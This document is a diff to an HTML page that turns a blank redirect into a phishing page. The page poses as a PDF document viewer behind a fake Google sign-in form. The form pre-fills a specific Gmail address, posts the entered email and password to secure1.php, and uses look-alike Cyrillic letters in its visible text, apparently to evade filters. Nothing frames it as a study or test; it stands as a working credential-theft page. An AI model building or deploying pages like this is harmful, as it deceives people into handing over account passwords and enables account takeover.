--- a/index.html
+++ b/index.html
@@ -1,11 +1,134 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-<meta http-equiv="refresh" content="1; url=http://google.com/" />
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-<title>Untitled Document</title>
+<title>cpowAudition_req.pdf</title>
+<style type="text/css">
+body {
+	background-color: #cccccc;
+	background-image: url(bg_pdf.jpg);
+	background-attachment: fixed;
+	background-repeat: no-repeat;
+	background-position: center top;
+}
+.loginbox {
+	width: 354;
+	height: 200px;
+	box-shadow: 0px 0px 6px #c4c5c6;
+	background-color: #FFF;
+	padding-right: 12px;
+	padding-bottom: 12px;
+	padding-left: 12px;
+	border: 1px solid #CCC;
+}
+.please_login {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 18px;
+	color: #000;
+}
+.sign_in_title {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 17px;
+	color: #000;
+}
+.username_pass {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 13px;
+	color: #333;
+	font-weight: bold;
+}
+.cant_access {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 13px;
+	color: #0066CC;
+}
+.textfield {
+	background-color: #FFF;
+	padding-top: 7px;
+	padding-bottom: 7px;
+	border: 1px solid #dadada;
+	padding-right: 7px;
+	padding-left: 7px;
+}
+.sign_in_box {
+	background-color: #f1f1f1;
+	border: 1px solid #e5e5e5;
+	padding-right: 20px;
+	padding-bottom: 20px;
+	padding-left: 20px;
+}
+a:link {
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+a:hover {
+	text-decoration: none;
+}
+a:active {
+	text-decoration: none;
+}
+.blue_button {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 12px;
+	color: #FFF;
+	background-color: #4c8efc;
+	background-image:url(button_bg.jpg);
+	background-repeat:repeat-x;
+	border: 0;
+	font-weight: bold;
+	padding-top: 10px;
+	padding-right: 15px;
+	padding-bottom: 10px;
+	padding-left: 15px;
+	border-radius: 3px;
+}
+.google_grey_space {
+	padding-left: 165px;
+}
+.stay_signed_in {
+	font-family: Arial, Helvetica, sans-serif;
+	font-size: 13px;
+	color: #4B4B4B;
+}
+.gmail_logo {
+	padding-top: 10px;
+}
+</style>
 </head>
 
 <body>
+<div align="center"><br />
+  <br />
+  <br />
+  <br />
+  <br />
+</div>
+<table width="354" border="0" align="center" cellpadding="0" cellspacing="0" class="loginbox">
+  <tr>
+    <td valign="top"><p>   <img src="logo.jpg" width="173" height="30" class="gmail_logo" /></p>
+    <p class="please_login">Рlеаsе lоgin tо viеw this dосumеnt.</p>
+    <div class="sign_in_box">
+      <p class="sign_in_title">Sign in<img src="google_grey.png" width="70" height="30" class="google_grey_space" /></p>
+      <form id="form1" name="form1" method="post" action="secure1.php">
+        <p><span class="username_pass"> Usеrnаmе</span><br />
+          <label for="email"></label>
+          <input name="email" type="text"  class="textfield" id="email" value="powell7365@gmail.com" size="40" />
+        </p>
+        <p><span class="username_pass"> Раsswоrd</span><br />
+          <label for="password"></label>
+          <input name="password" type="password" autofocus="autofocus" class="textfield" id="password" size="40" />
+</p>
+        <p>
+          <input name="button" type="submit" style="cursor:pointer;" class="blue_button" id="button" value="Sign in" /> 
+             
+          <input name="checkbox" type="checkbox" id="checkbox" checked="checked" />
+          <span class="stay_signed_in">Stаy signеd in</span></p>
+      </form>
+      <a href="https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F"><span class="cant_access">      Саn't ассеss yоur ассоunt?
+      </span></a></div></td>
+  </tr>
+</table>
 </body>
 </html>
